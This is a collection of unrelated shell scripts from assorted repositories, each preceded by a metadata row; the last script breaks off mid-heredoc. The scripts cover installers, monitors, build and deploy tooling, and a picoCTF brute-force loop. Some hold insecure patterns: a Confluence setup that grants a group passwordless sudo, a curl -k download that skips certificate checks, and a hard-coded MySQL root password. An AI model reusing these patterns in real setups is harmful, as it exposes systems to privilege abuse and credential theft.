/usr/sbin/useradd --create-home --home-dir /opt/confluence --comment "Account for running Confluence Software" -g atlassian --shell /bin/bash confluence
# Grant passwordless sudo to the atlassian group.
echo "%atlassian ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers
# BUG FIX: -f makes curl return non-zero on HTTP errors; previously an
# error page would have been saved silently and fed to tar.
curl -fLks https://www.atlassian.com/software/confluence/downloads/binary/atlassian-confluence-${CONFLUENCE_VERSION}.tar.gz -o /root/confluence.tar.gz
tar zxf /root/confluence.tar.gz --strip=1 -C /opt/confluence
rm -f /root/confluence.tar.gz
# Lock the install tree down to the service account.
chown -R confluence:atlassian /opt/confluence
chmod -R u=rwx,go-rwx /opt/confluence
# Separate writable data directory (confluence.home).
mkdir -p /opt/confluence-home
chown -R confluence:atlassian /opt/confluence-home
chmod -R u=rwx,go-rwx /opt/confluence-home
echo "confluence.home = /opt/confluence-home" > /opt/confluence/confluence/WEB-INF/classes/confluence-init.properties
# Keep a pristine copy of server.xml before later customisation.
mv /opt/confluence/conf/server.xml /opt/confluence/conf/server.xml.orig
| true |
2446cb6dd1331814aab55fce852204259cf0e82b | Shell | theprimo/Shell_Scripts_For_Various_Checks | /java_heap_check_v0.2.sh | UTF-8 | 1,153 | 2.875 | 3 | [] | no_license | curHrMin=`date +"%H:%M"`
# Percentage threshold above which a PermGen alert mail is sent.
MAXHEAPLIMIT=70.99

# PID of the first WebLogic server process.
# NOTE(review): 'grep -v $curHrMin' presumably filters this script's own
# entry out of the ps listing -- confirm; 'grep -v grep' is the usual idiom.
pid=$(ps -ef | grep "weblogic.Server" | grep -v "$curHrMin" | awk -F ' ' '{print $2}' | head -1)

# --- Eden space ----------------------------------------------------------
# One jstat call instead of two: field 5 = EC (capacity), field 6 = EU (used).
read -r ec eu <<< "$(/products/jdk1.7/bin/jstat -gc "$pid" | tail -1 | awk -F ' ' '{print $5, $6}')"
eUsage=$(echo "scale=6;$eu/$ec" | bc)
ePer=$(echo "scale=6;$eUsage*100" | bc)
echo "Current Eden Space (HEAP)="$ePer
if [ "$(echo "$ePer > 99.99" | bc -l)" -eq 1 ]
then
	echo "Load on Eden Space is" ${ePer}%
fi

# --- PermGen space -------------------------------------------------------
# One jstat call: field 9 = PC (capacity), field 10 = PU (used).
read -r pc pu <<< "$(/products/jdk1.7/bin/jstat -gc "$pid" | tail -1 | awk -F ' ' '{print $9, $10}')"
pUsage=$(echo "scale=6;$pu/$pc" | bc)
PPer=$(echo "scale=6;$pUsage*100" | bc)
echo "Current PermGenSpace Usage="$PPer
if (( $(echo "$PPer > $MAXHEAPLIMIT" | bc -l) ));
then
	echo "Load on PermGen Space is" ${PPer}%
	# BUG FIX: the mail body hard-coded "99.99%" although the configured
	# threshold is $MAXHEAPLIMIT; report the real threshold instead.
	echo -e "Hi All \n\n PermGen Threshold of ${MAXHEAPLIMIT}% exceeded and the usage detected is ${PPer}% \n\n Thanks & Regards,\n SSO AM Team"| mailx -s "Alert!! in $HOSTNAME - Interface connection status" v.a.cherukuri@accenture.com
fi
| true |
52142eebd05a6274b4b8d7cf509e4c5f09ad2beb | Shell | adrian-amaglio/streamplayer | /streamplayer | UTF-8 | 845 | 3.5625 | 4 | [] | no_license | #!/bin/bash
#trap : SIGTERM SIGINT
# TODO end this

# Toggle-style stream player: the first invocation plays the "name url"
# pairs from the config file one after another; a second invocation (while
# a player is running) kills it via the pid file.

# BUG FIX: index_begining was read below but never defined, which made the
# numeric comparison fail; default it to 0 while still honouring any value
# inherited from the environment.
index_begining=${index_begining:-0}

# Pick the requested stream number, clamped to index_begining.
# NOTE(review): stream_number is computed but never used below --
# presumably meant to skip ahead in the config file; confirm.
if [ -n "$1" ] ; then
  if [ "$1" -ge "$index_begining" ] ; then
    stream_number="$1"
  else
    stream_number="$index_begining"
  fi
else
  stream_number="$index_begining"
fi

# TODO what if undefined ?
config_file=$XDG_CONFIG_HOME/streamplayer/conf
# TODO what if undefined ?
pid_file=$XDG_RUNTIME_DIR/streamplayer.pid
# TODO $player must contain no whitespace to compare with /proc/.../cmdline
player=mplayer

if [ -e "$pid_file" ]
then
  # A player is already running: stop it.
  echo "$pid_file"
  # BUG FIX: the kill used a hard-coded /run/user/$UID path; use the same
  # $pid_file ($XDG_RUNTIME_DIR based) that is written below.
  kill "$(cat "$pid_file")"
else
  # Play each "name url" pair from the config file in sequence.
  while read -r line
  do
    IFS=' ' read stream_name stream_url <<< "$line"
    echo "$stream_name"
    $player "$stream_url" >/dev/null 2>/dev/null &
    player_pid="$!"
    echo "$player_pid" > "$pid_file"
    wait
    echo 'next'
    rm "$pid_file"
  done < "$config_file"
fi
| true |
94a3943bf62160bf75a12c758f823f9d02ac8a29 | Shell | feirm/app | /deploy.sh | UTF-8 | 938 | 3.515625 | 4 | [
"MIT"
] | permissive | #/bin/bash
# Feirm Platform web app deployment script
# Builds the latest git tag for production, deploys it via scp, then
# builds the current branch for staging and deploys that too.
# Deployment folders
PRODUCTION="app.feirm.com"
STAGING="staging.feirm.com"
# Current branch (restored after the production build)
CURRENT_BRANCH=$(git branch --show-current)
# Production deployment
# Fetch latest tag
echo 'Getting ready for production deployment...'
LATEST_TAG=$(git describe --abbrev=0)
# Checkout and compile for production
git checkout $LATEST_TAG
# Clean install so stale dependencies cannot leak into the build.
rm -rf node_modules
yarn install
yarn build --mode production
# Copy files over to server
echo 'Transferring files to production server...'
scp -r dist/* feirm:/home/jack/Feirm-Caddy/caddy_data/$PRODUCTION
# Cleanup
rm -rf dist/
rm -rf node_modules
# Checkout back to previous branch
git checkout $CURRENT_BRANCH
# Staging deployment
# Use current branch
yarn install
yarn build --mode staging
# Copy files over to server
echo 'Transferring files to staging server...'
scp -r dist/* feirm:/home/jack/Feirm-Caddy/caddy_data/$STAGING
rm -rf dist/ | true |
08efd0f8bb58a342772d36a0efbb155ef1d2fb33 | Shell | bash-suite/ml-replace | /ml-replace.sh | UTF-8 | 2,326 | 4.34375 | 4 | [
"MIT"
] | permissive | #!/bin/bash
#
# Multiline replace tool using sed.
#
# Usage: ml-replace.sh <search> <replace> <input>; the literal <search>
# text (possibly spanning several lines) is replaced by <replace> in
# <input>, with the result written to stdout.
readonly progname=$(basename $0)
# Display help message (written to stderr)
getHelp() {
    cat << USAGE >&2
Usage: $progname [search] [replace] [input]
Examples:
    ml-replace.sh "$search" "$replace" input.txt > output.txt
USAGE
}
# At least three parameters are needed
if [ $# -ne 3 ]; then
    getHelp
    exit 1
fi
#
search="$1"
replace="$2"
input="${3:--}"
# SYNOPSIS
# quoteSearch <text>
#
# DESCRIPTION
# Quotes (escapes) the specified literal text for use in a regular expression,
# whether basic or extended - should work with all common flavors.
#
# sed doesn't support use of literal strings as replacement strings - it invariably
# interprets special characters/sequences in the replacement string.
quoteSearch() {
sed -e 's/[^^]/[&]/g; s/\^/\\^/g; $!a\'$'\n''\\n' <<<"$1" | tr -d '\n';
}
# SYNOPSIS
# quoteReplace <text>
#
# DESCRIPTION
# Quotes (escapes) the specified literal string for safe use as the substitution
# string (the 'new' in `s/old/new/`).
#
# The search string literal must be escaped in a way that its characters aren't
# mistaken for special regular-expression characters.
quoteReplace() {
IFS= read -d '' -r < <(sed -e ':a' -e '$!{N;ba' -e '}' -e 's/[&/\]/\\&/g; s/\n/\\&/g' <<<"$1")
printf %s "${REPLY%$'\n'}"
}
# -> The newlines in multi-line input strings must be translated to '\n' strings,
# which is how newlines are encoded in a regex.
# -> $!a\'$'\n''\\n' appends string '\n' to every output line but the last (the
# last newline is ignored, because it was added by <<<)
# -> tr -d '\n then removes all actual newlines from the string (sed adds one
# whenever it prints its pattern space), effectively replacing all newlines
# in the input with '\n' strings.
# -> -e ':a' -e '$!{N;ba' -e '}' is the POSIX-compliant form of a sed idiom that
# reads all input lines a loop, therefore leaving subsequent commands to operate
# on all input lines at once.
#
# Sources from:
# https://stackoverflow.com/questions/29613304/is-it-possible-to-escape-regex-metacharacters-reliably-with-sed/29613573#29613573
# https://stackoverflow.com/questions/24890230/sed-special-characters-handling/24914337#24914337
sed -e ':a' -e '$!{N;ba' -e '}' -e "s/$(quoteSearch "$search")/$(quoteReplace "$replace")/" "$input"
| true |
fae071b22b1a8fe06e4c59ebbfcbe66d3de4d429 | Shell | ns-bak/tetracorder-tutorial | /src-local/specpr/src.fstospecpr/fstospecpr-multiple-hpux | UTF-8 | 1,080 | 3.921875 | 4 | [] | no_license | #!/bin/sh
# Script to add field spectra to an existing spd0xxx tape file
#
# Translates base-filename.000 .. base-filename.NNN with fstospecpr,
# appending each spectrum to the given tape file.
#
# test for command line arguments 1, 2, and 3
#
if test $# -lt 3
then    echo " "
	echo "syntax: fstospecpr-multiple base-filename spd0xxx ending-number-of-spectra [flags]"
	echo " "
	echo "        valid flags:  -na = no channel average (default)"
	echo "        valid flags:  -av = channel average"
	exit 1
fi
#
# copy the files
#
basename=$1
tapefile=$2
nfiles=$3
flags="-na"
if [ "$4" = "-av" ]
then
	flags=$4
fi
count=0
#
while test $count -le $nfiles
do
	# Zero-pad the extension to three digits (.000 .. .999); a single
	# POSIX printf replaces the old if/elif ladder.
	extension=$(printf '.%03d' "$count")
	echo " "
	echo "------------------------------------------------"
	echo "TRANSLATING FILE:" $basename$extension
	echo "fstospecpr $flags $basename$extension $tapefile"
	fstospecpr $flags $basename$extension $tapefile
	# POSIX arithmetic expansion instead of forking expr each iteration.
	count=$((count + 1))
done
#
# finish
#
echo " "
echo "*** DONE ***"
| true |
67b083b64b45699f5146f87a2865b40250d06ae2 | Shell | mason-mx/ELK-Docker | /elk5/filebeat-entrypoint.sh | UTF-8 | 1,527 | 3.96875 | 4 | [] | no_license | #!/bin/bash
# Test an IP address for validity:
# Usage:
#      valid_ip IP_ADDRESS
#      if [[ $? -eq 0 ]]; then echo good; else echo bad; fi
#   OR
#      if valid_ip IP_ADDRESS; then echo good; else echo bad; fi
#
function valid_ip()
{
    local addr=$1
    local rc=1

    # Shape check first: four dot-separated groups of 1-3 digits.
    if [[ $addr =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]; then
        # Split on the dots and range-check every octet (<= 255).
        local -a octet
        IFS='.' read -r -a octet <<< "$addr"
        [[ ${octet[0]} -le 255 && ${octet[1]} -le 255 \
            && ${octet[2]} -le 255 && ${octet[3]} -le 255 ]]
        rc=$?
    fi
    return $rc
}
# Ask the operator for the ElasticSearch host and keep re-prompting until
# a syntactically valid IPv4 address is supplied.
echo "Please enter the IP address of the ElasticSearch:"
read hostip
# NOTE(review): tryagain/checkip recurse into each other; extremely long
# runs of bad input would grow the call stack -- a loop would be safer.
tryagain () {
    echo "Incorrect IP format detected, please input once again:"
    read hostip
    checkip
}
checkip () {
  if valid_ip $hostip;
  then
    echo "Going to feed $hostip"
  else
    tryagain
  fi
}
checkip
# Point the filebeat config at the chosen host.
sed -i "s/localhost/$hostip/" ./ncedc-earthquakes-filebeat.yml
# Add pipeline and template
curl -XPUT -H 'Content-Type: application/json' "$hostip:9200/_ingest/pipeline/ncedc-earthquakes" -d @/earthquakes/ncedc-earthquakes-pipeline.json
curl -XPUT -H 'Content-Type: application/json' "$hostip:9200/_template/ncedc-earthquakes" -d @/earthquakes/ncedc-earthquakes-template.json
set -e
# Add elasticsearch as command if needed
#if [ "${1:0:1}" = '-' ]; then
#  set -- node "$@"
#fi
# As argument is not related to elasticsearch,
# then assume that user wants to run his own process,
# for example a `bash` shell to explore this image
exec "$@"
| true |
8bcb158fa88866139735c4e69540d3b4ab7b2f1c | Shell | ysong4/losha-1 | /apps/simhash/handle_glove2.2m/script/cal_groundtruth.sh | UTF-8 | 553 | 2.828125 | 3 | [
"Apache-2.0"
] | permissive | cd ../build
# Build the cal_groundtruth tool and compute ground-truth nearest
# neighbours for the glove2.2m dataset.
# cmake ../ -DCMAKE_BUILD_TYPE=Debug
cmake ../ -DCMAKE_BUILD_TYPE=Release
make cal_groundtruth 2>&1 | tee ../script/log.txt
cd ../script
# Abort when the captured build log mentions an error.
# NOTE(review): grepping the log is fragile -- checking make's exit status
# directly would be more reliable.
log=`grep error log.txt`
if [ "$log" != "" ]; then
    exit
fi
# Ground-truth parameters: top-k neighbours and vector dimensionality.
topk=10
dimension=300;
base_file="./output/glove2.2m_base.fvecs"
query_file="./output/glove2.2m_query.fvecs"
ivecs_bench_file="./output/glove2.2m_groundtruth.ivecs"
lshbox_bench_file="./output/glove2.2m_groundtruth.lshbox"
../build/bin/cal_groundtruth $base_file $query_file $topk $lshbox_bench_file $ivecs_bench_file $dimension
| true |
e24a9979be731b11ba6a1dd72052b3a8ec191ac6 | Shell | nitinkundani/Guessing-Game-Project | /guessinggame.sh | UTF-8 | 382 | 4 | 4 | [] | no_license | #Program to check the guess of number of files in a directory
#- Nitin Kundani

# Interactive game: keep prompting until the user guesses how many
# entries `ls` reports in the current directory.
target=$(ls | wc -l)
guess=-1

until [[ $guess -eq $target ]]
do
	echo "How many files are in the current directory ?"
	read arg
	guess=$arg
	if [[ $guess -lt $target ]]
	then
		echo "Too low"
	elif [[ $guess -gt $target ]]
	then
		echo "Too high"
	else
		echo "Congratulations, your guess is correct."
	fi
done
| true |
ee19ba72718fa76078828849cd7bb6c2e512dc89 | Shell | ewon/efive | /src/rc.d/rc.bewanadsl | UTF-8 | 1,784 | 3.609375 | 4 | [] | no_license | #!/bin/bash
#
# $Id: rc.bewanadsl 1899 2008-09-16 19:54:22Z owes $
#
# Init-style helper that loads/unloads the Bewan (Unicorn) ADSL modem
# driver; the PPP settings file provides $MODEM and $MODULATION.
eval $(/usr/local/bin/readhash /var/ipcop/ppp/settings)
# Debugging. Comment it out to stop logging
DEBUG="yes"
# Print a message to stdout and, while DEBUG is non-empty, copy it to
# syslog under the "red" tag.
msg() {
    if [ -n "$DEBUG" ] ; then
        /usr/bin/logger -t red "BEWAN ADSL: $*"
    fi
    /bin/echo "$*"
}
# Poll the UNICORN ATM device status for up to ~90 s (45 iterations of a
# 2 s sleep) until the line reports SHOWTIME (DSL sync established).
# Returns 0 on sync, 1 on timeout.
function wait_for_showtime() {
    count=0
    while [ ! $count = 45 ]; do
        /bin/sleep 2
        if ( /bin/cat /proc/net/atm/UNICORN:* | /bin/grep -q "SHOWTIME" ); then
            return 0
        fi
        ((++count))
    done
    return 1
}
# Pick the kernel module for the configured modem: PCI vs USB variant.
if [ "$MODEM" = "PCIST" ]; then
    UNICORN="unicorn_pci_atm"
else
    UNICORN="unicorn_usb_atm"
    # The USB driver is useless without a USB stack.
    if [ ! -f "/proc/bus/usb/devices" ]; then
        msg "No USB enabled"
        exit 1
    fi
    # commented because actually cat /proc/bus/usb/devices may trigger some verbose error until pppd session start
    # if ( ! /bin/cat /proc/bus/usb/devices | /bin/grep -q 'Vendor=07fa' ); then
    #    msg "No ST chip : not supported by this driver"
    #    exit 1
    # fi
fi
# See how we were called.
case "$1" in
start)
    # ActivationMode : ANSI=1,G.lite=2,MULTI=3,G.dmt=4
    case "$MODULATION" in
    GDMT)  ActivationMode=4 ;;
    ANSI)  ActivationMode=1 ;;
    GLITE) ActivationMode=2 ;;
    AUTO)  ActivationMode=3 ;;
    esac
    msg "Loading $UNICORN, Modulation=$MODULATION, may take time to uncompress..."
    /sbin/modprobe "$UNICORN" ActivationMode="$ActivationMode"
    if [ ! $? = 0 ]; then
        msg "Loading fail, is the modem plugged in?"
        exit 1
    fi
    # Block until the line syncs; propagate timeout as failure.
    wait_for_showtime
    if [ $? = 1 ]; then
        exit 1
    fi
    ;;
stop)
    msg "stop"
    ;;
cleanup)
    # Unload the driver entirely.
    msg "cleanup"
    /sbin/modprobe -r "$UNICORN"
    ;;
*)
    /bin/echo "Usage: $0 {start|stop|cleanup}"
    exit 1
    ;;
esac
exit 0
| true |
2033c0dd8ec612ef4b4654e87cae0e7b4fe91890 | Shell | i95n/pdqtogo | /scripts/release-it.sh | UTF-8 | 405 | 2.96875 | 3 | [
"MIT"
] | permissive | docker build -t pdqtogo -f continer/Dockerfile .
# Bump the version, tag the freshly built local "pdqtogo" image with it
# and push to the i95north/pdqtogo registry repository.
sh scripts/version.sh $(cat version.txt) feature > version.txt
# NOTE(review): parsing `docker images` output is fragile; `docker images
# -q pdqtogo:latest` would return the id directly.
imageid=$(docker images | grep "pdqtogo" | grep "latest" | awk '{print $3}')
version=$(cat version.txt)
docker tag $imageid i95north/pdqtogo:$version
echo "latest [pdqtogo#$imageid] was tagged with $version"
docker push i95north/pdqtogo
git tag -a v$version -m "Tagged version v$version" | true |
88a64e210c7d7d5d64c0253dc6c94aa4a58dc23a | Shell | d-salerno/tthbb13 | /TTHNtupleAnalyzer/utils/recursive-hadd.sh | UTF-8 | 798 | 3.546875 | 4 | [] | no_license | #!/bin/bash
set -e
# Merge a (large) list of ROOT files in three hadd passes, fanning in
# 10-at-a-time, then 5-at-a-time, then all, to keep each hadd call small.
#GNU parallel
PARCMD=~joosep/parallel
#list of input files
SRCFILE=$2
#directory under which to save output, will be created
DSTDIR=`mktemp -d`
DSTFILE=$1
#first pass, 10 files per hadd
rm -Rf $DSTDIR/step1
mkdir -p $DSTDIR/step1
echo "step1"
cat $SRCFILE | $PARCMD -n10 hadd $DSTDIR/step1/merged_{#}.root {}
#second pass, 5 files per hadd
rm -Rf $DSTDIR/step2
mkdir -p $DSTDIR/step2
echo "step2"
find $DSTDIR/step1 -name "merged_*.root" | $PARCMD -n5 hadd $DSTDIR/step2/merged_{#}.root {}
#final pass, hadd all
rm -f $DSTDIR/merged.root
echo "step3"
hadd $DSTDIR/merged.root $DSTDIR/step2/merged_*.root
rm -Rf $DSTDIR/step1
rm -Rf $DSTDIR/step2
#move final file
mv $DSTDIR/merged.root $DSTFILE
#output is at $DSTDIR/merged.root
du -csh $DSTFILE
#cleanup
rm -Rf $DSTDIR
| true |
b3587eb8a198a8008e842bdaf9a4cef28d33e70e | Shell | keixille/hackerrank | /Tutorials/Linux_Shell/Array_in_Bash/concatenate-an-array-with-itself.sh | UTF-8 | 166 | 3.265625 | 3 | [] | no_license | count=0
# Read whitespace-separated tokens from stdin into an array ($count is
# initialised above), then print the array repeated three times on one
# line -- unquoted expansion collapses the copies into a single
# space-separated string, matching the expected HackerRank output.
for token in $(cat)
do
    arr[$count]=$token
    count=$(( count + 1 ))
done

tripled=$(echo ${arr[@]} ${arr[@]} ${arr[@]})
echo $tripled
| true |
063ade8741d5a73162ba379f0d5ea3e1327dc7b0 | Shell | Gr3yR0n1n/picoCtf2017-1 | /level-1/Bash Loop/ans.bash | UTF-8 | 150 | 3.140625 | 3 | [] | no_license | #!/bin/bash
# Brute-force the picoCTF "Bash Loop" challenge: try every number in the
# accepted range and print whatever response is not the rejection message.
for i in {0..4096};
do
	l=`./bashloop $i`
	# Anything other than the canned "Nope" reply is the flag.
	if [ "$l" != "Nope. Pick another number between 0 and 4096" ]
	then
		echo $l
	fi
done | true |
00b3d2b50e02c083bc335f2e3e4628d9f2995313 | Shell | danielgustafsson/sebuild | /scripts/invars.sh | UTF-8 | 872 | 3.625 | 4 | [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | #!/bin/bash
# Copyright 2018 Schibsted
# Source one or more buildvars files and emit derived build variables
# (BUILD_STAGE, READLINK, GOPATH, GOARCH, GOOS) as "KEY=value" lines via
# setval, which both assigns and prints each variable.
if [ $# -lt 1 ] ; then
	echo "Must specify buildvars as argument." >&2
	exit 1;
fi
set -e
# Source every buildvars file given on the command line; these may define
# setval/depend themselves as well as buildflavor, gopath, depfile, ...
for f in "$@"; do
	. $f
done
# Fallback setval: assign KEY=value in the current shell and echo it.
# NOTE(review): the eval shell-interpolates the value -- callers must only
# pass trusted input.
if [ "$(command -v setval)" != "setval" ]; then
	setval() {
		local _k=$1
		shift
		eval "$_k=\"$*\""
		echo "$_k=$*"
	}
fi
# Fallback depend: append dependencies to $depfile, or a no-op when no
# depfile is configured.
if [ "$(command -v depend)" != "depend" ]; then
	if [ -n "$depfile" ]; then
		depend() {
			for dep in $@; do
				echo -n " ${dep}" >> ${depfile}
			done
		}
	else
		depend() {
			:
		}
	fi
fi
setval BUILD_STAGE `echo $buildflavor | tr [:lower:] [:upper:]`
# Prefer GNU readlink (greadlink) when available, e.g. on macOS.
setval READLINK $(type -p greadlink readlink | head -1)
# Rebuild gopath as a colon-separated list of absolute, existing paths.
oldifs="$IFS"
IFS=":"
gp=""
for p in $gopath; do
	ABSP=$($READLINK -f $p || true)
	[ -z "$ABSP" ] && continue
	gp="$gp:$ABSP"
done
# Strip initial :
setval GOPATH "${gp:1}"
IFS="$oldifs"
setval GOARCH $(go env GOARCH 2>/dev/null)
setval GOOS $(go env GOOS 2>/dev/null)
| true |
63494bd22bce32199d37adf825ef063e2bd5e489 | Shell | dawnbreaks/taomee | /hadoop/game-report/eqin/jobscheduler/cleanlog | UTF-8 | 810 | 3.1875 | 3 | [] | no_license | #!/bin/sh
# Purge 15-day-old results for the given project from the local log file,
# HDFS and the MySQL result database.
if [ $# -ne 1 ] ; then
	echo "Usage $0 project"
	exit
fi
. /etc/profile
PROJECT=$1;
echo "clean the logs 15 days ago"
day=$(date +%Y%m%d --date='15 days ago')
file=${day}.log
rm ${file}
echo "clean result data in hdfs"
hdfsdata=/user/hadoop/result/${PROJECT}/${day}
hadoop fs -rmr $hdfsdata
echo "clean result data in database"
DAY=$(date +%Y-%m-%d --date='15 days ago')
# NOTE(review): database credentials are hard-coded on the command line
# (visible in ps); consider a protected ~/.my.cnf instead.
REMOTE_EXEC_SQL="mysql -uroot -pta0mee --skip-column-names --host=192.168.11.237"
DB="hadoopdailyresult"
echo "DELETE FROM ${DB}.dboprcounter where time < '${DAY}'" | $REMOTE_EXEC_SQL
echo "DELETE FROM ${DB}.failedlogin where time < '${DAY}'" | $REMOTE_EXEC_SQL
echo "DELETE FROM ${DB}.onlinecount where time < '${DAY}'" | $REMOTE_EXEC_SQL
echo "DELETE FROM ${DB}.onlinetime where time < '${DAY}'" | $REMOTE_EXEC_SQL
| true |
22a70b562651f0c5c24827c3d7e323e13fef5719 | Shell | lollipopman/bin | /dockerrm | UTF-8 | 195 | 2.734375 | 3 | [] | no_license | #!/bin/bash
# Delete all containers (running or stopped)
docker ps -a -q | while IFS= read -r container; do
  docker rm "${container}"
done

# Delete all images, forcing removal of tagged/parent images
docker images -q | while IFS= read -r image; do
  docker rmi -f "${image}"
done
| true |
52a997a7c66e2baa7201ea84e16dc18bb0b8f5ac | Shell | yodaos-project/voice-interface-google-assistant | /tools/build-host.sh | UTF-8 | 593 | 3.40625 | 3 | [
"Apache-2.0"
] | permissive | set -ex
# Build gRPC (with its bundled protobuf) and the googleapis C++ stubs on
# the host.  Usage: build-host.sh [-j N]
PAR=1
while [ $# -gt 0 ]; do
    case "$1" in
    -j)
        # Number of parallel make jobs; consumes the following argument.
        PAR=$2
        shift
        ;;
    -h)
        printf "$help"
        exit
        ;;
    --*)
        echo "Illegal option $1"
        exit
        ;;
    esac
    shift $(( $# > 0 ? 1 : 0 ))
done
PROJECT_PATH=$(pwd)
# MARK: - gRPC
GRPC_PATH=${PROJECT_PATH}/grpc
cd ${GRPC_PATH}
# Build and install the bundled protobuf first.
cd third_party/protobuf
./autogen.sh && ./configure && make -j$PAR
make install
ldconfig
export LDFLAGS="$LDFLAGS -lm"
# Then gRPC itself.
cd ${GRPC_PATH}
make clean
make -j$PAR
make install
ldconfig
# MARK: - GoogleAPIs
cd ${PROJECT_PATH}
cd googleapis/
make LANGUAGE=cpp -j$PAR
| true |
36c963bce641e96648cccd41eda0bd7989f781d9 | Shell | justpayne/jburkardt-f77 | /testpack/testpack.sh | UTF-8 | 366 | 3.046875 | 3 | [] | no_license | #!/bin/bash
#
# Compile testpack.f with gfortran and install the executable as
# ~/binf77/$ARCH/testpack, aborting on compile or link errors.
gfortran -c -g testpack.f >& compiler.txt
if [ $? -ne 0 ]; then
  echo "Errors compiling testpack.f"
  exit
fi
rm compiler.txt
#
gfortran testpack.o
if [ $? -ne 0 ]; then
  echo "Errors linking and loading testpack.o"
  exit
fi
rm testpack.o
#
chmod ugo+x a.out
mv a.out ~/binf77/$ARCH/testpack
#
echo "Executable installed as ~/binf77/$ARCH/testpack"
| true |
039f5233302b1c4b95c7c1b69c7ed090bf6d7cf6 | Shell | kernsuite/packaging | /check_for_updates.sh | UTF-8 | 381 | 3.21875 | 3 | [] | no_license | #!/bin/bash -ve
# For every KERN package, clone/refresh its packaging repository and run
# uscan to record any available upstream updates in $KERN_ROOT/uscan_log.
KERN_ROOT="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
source ${KERN_ROOT}/settings.sh
pushd build
rm -f ${KERN_ROOT}/uscan_log
for i in $KERN_PACKAGES; do
    if [ ! -d "$i" ]; then
        git clone ${KERN_BASE}$i
    fi
    pushd $i
    git checkout upstream
    git checkout master
    git pull
    # uscan exits non-zero when nothing is new; '|| true' keeps the -e
    # from the shebang from aborting the loop.
    uscan --dehs 1>> ${KERN_ROOT}/uscan_log || true
    popd
done
| true |
ff962224673fab925f810af4d5425293114e64a8 | Shell | jinx-lnx/system | /sys/gen-srv-info | UTF-8 | 5,329 | 3.6875 | 4 | [] | no_license | #!/bin/bash -u
# Gather a few important facts about this server and show the summary
# when someone logs into the server.
# The collected values are baked into /etc/profile.d/gwn-show-srv.sh,
# which prints the summary table at login time.
# -------------------------------------------------------------------
# OS VERSION
# -------------------------------------------------------------------
# Colour-code old releases in the summary (12.04 red, 16.04 magenta).
LSB=$(/usr/bin/lsb_release -rs)
if [ "${LSB}" == "12.04" ] ; then
  OS="\e[41m$(/usr/bin/lsb_release -sd)\e[49m"
elif [ "${LSB}" == "16.04" ] ; then
  OS="\e[45m$(/usr/bin/lsb_release -sd)\e[49m"
else
  OS="$(/usr/bin/lsb_release -sd)"
fi
# -------------------------------------------------------------------
# SERVER TYPE
# -------------------------------------------------------------------
# The output of imvirt is not stable and sometimes shows "Unknown",
# so we will just distinguish between Physical and non-Physical.
# For some improvement, let's try the imvirt command up to 5 times
# or until it returns anything else but 'Unknown'.
for I in $(seq 5) ; do
  TYPE=$(/usr/bin/imvirt 2>/dev/null)
  if [ "${TYPE}" != "Unknown" ] ; then
    break
  fi
  sleep .5
done
MODEL=
if [ -n "${TYPE}" ] ; then
  if [ "${TYPE}" != "Physical" ] ; then
    TYPE="Virtual (${TYPE})"
  else
    # Try to guess the actual server model
    PROD=$(/usr/sbin/smbios-sys-info-lite | grep "^Product Name:" | cut -d ':' -f2 | sed -e 's/^[ ]\+//')
    if [ -n "${PROD}" ] ; then
      MODEL=" (${PROD})"
    else
      OEM=$(/usr/sbin/smbios-sys-info-lite | grep "^OEM System ID:" | cut -d ':' -f2 | sed -e 's/^[ ]\+//')
      if [ "${OEM}" == "0x8127" ] ; then
        MODEL=" (PowerEdge R420)"
      elif [ "${OEM}" == "0x8162" ] ; then
        MODEL=" (PowerEdge R430)"
      fi
    fi
  fi
else
  # NOTE(review): "UNKOWN" is a typo for "UNKNOWN" in the displayed value;
  # left as-is here because this is a documentation-only pass.
  TYPE="UNKOWN"
fi
# -------------------------------------------------------------------
# WEB SERVER (nginx or lighttpd)
# -------------------------------------------------------------------
# Determine whether we are running lighttpd or nginx
RELEASE=$(lsb_release -rs)
if [ "${RELEASE}" == "12.04" -o "${RELEASE}" == "14.04" ] ; then
  # Upstart
  WEB=$(service --status-all 2>&1 | egrep " \[ \+ \]  (nginx|lighttpd)" | cut -c9-)
else
  # Systemd
  WEB=$(systemctl list-unit-files --type=service | egrep "^(nginx|lighttpd).*enabled" | cut -d'.' -f1)
fi
# -------------------------------------------------------------------
# FIREWALL TYPE
# -------------------------------------------------------------------
if [ -x /usr/sbin/ufw ] ; then
  FIREWALL="ufw"
elif [ -x /sbin/iptables ] ; then
  FIREWALL="\e[45mplain iptables\e[49m"
else
  FIREWALL="\e[41mUNKNOWN\e[49m"
fi
# -------------------------------------------------------------------
# APPLICATION SERVER
# -------------------------------------------------------------------
# A bit clumsy, but works...
# Are we a RAS?
if [ -x /usr/sbin/crm ] ; then
  RES=$(/usr/sbin/crm resource show | grep Wildfly)
  if [ -n "${RES}" ] ; then
    APP="Wildfly Cluster"
  else
    RES=$(/usr/sbin/crm resource show | grep JBoss)
    if [ -n "${RES}" ] ; then
      APP="JBoss7 Cluster"
    else
      APP=""
    fi
  fi
else
  # Standalone appserver?
  /sbin/initctl show-config wildfly 2>/dev/null | grep -q "start on"
  if [ $? -eq 0 ] ; then
    APP="Wildfly"
  else
    /sbin/initctl show-config gwn-jboss 2>/dev/null | grep -q "start on"
    if [ $? -eq 0 ] ; then
      APP="JBoss7"
    else
      APP=""
    fi
  fi
fi
# -------------------------------------------------------------------
# Next auto-highstate
# -------------------------------------------------------------------
# Deterministically hashed maintenance slot (weekday / hour / quarter).
AUTO_DAY=$(/opt/gwn/python/timeslot-hasher.py --tag HIGHSTATE --weekdays mon tue wed thu fri --hours 0 1 2 3 4 5 6 7 | grep '"picked_weekday"' | sed 's/^.*: //')
AUTO_HR=$(/opt/gwn/python/timeslot-hasher.py --tag HIGHSTATE --weekdays mon tue wed thu fri --hours 0 1 2 3 4 5 6 7 | grep '"picked_hour"' | sed 's/^.*: //')
AUTO_QTR=$(/opt/gwn/python/timeslot-hasher.py --tag HIGHSTATE --weekdays mon tue wed thu fri --hours 0 1 2 3 4 5 6 7 | grep '"picked_quarter"' | sed 's/^.*: //')
# Emit the login-time summary script.  Note: the heredoc bodies below are
# written verbatim into /etc/profile.d/gwn-show-srv.sh, so no comments may
# be added inside them.
cat << EOF > /etc/profile.d/gwn-show-srv.sh
# ----------------------------------------------------
# Auto-generated by /opt/gwn/system/create-srv-summary
# ----------------------------------------------------
printf "\n"
